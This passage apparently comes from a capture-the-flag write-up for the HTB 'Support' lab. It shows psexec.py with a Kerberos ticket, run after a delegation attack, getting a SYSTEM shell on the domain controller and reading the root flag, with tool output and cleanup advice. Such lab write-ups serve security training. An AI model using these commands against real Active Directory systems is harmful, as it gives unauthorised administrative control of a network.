Then use the ticket with psexec.py (-k -no-pass, so it authenticates with Kerberos from the ccache) to get a shell as SYSTEM and read the root flag. On a real engagement, clean up afterwards: rbcd.py -action remove with the same -delegate-from/-delegate-to, and delete the attack$ computer account.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/support]
└──╼ [★]$ psexec.py -k -no-pass dc.support.htb
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file RunuXIhQ.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service cZWd on dc.support.htb.....
[*] Starting service cZWd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> type \Users\Administrator\Desktop\root.txt
6c28f9b91c790f72f6b3322a251b5b41
C:\Windows\system32>
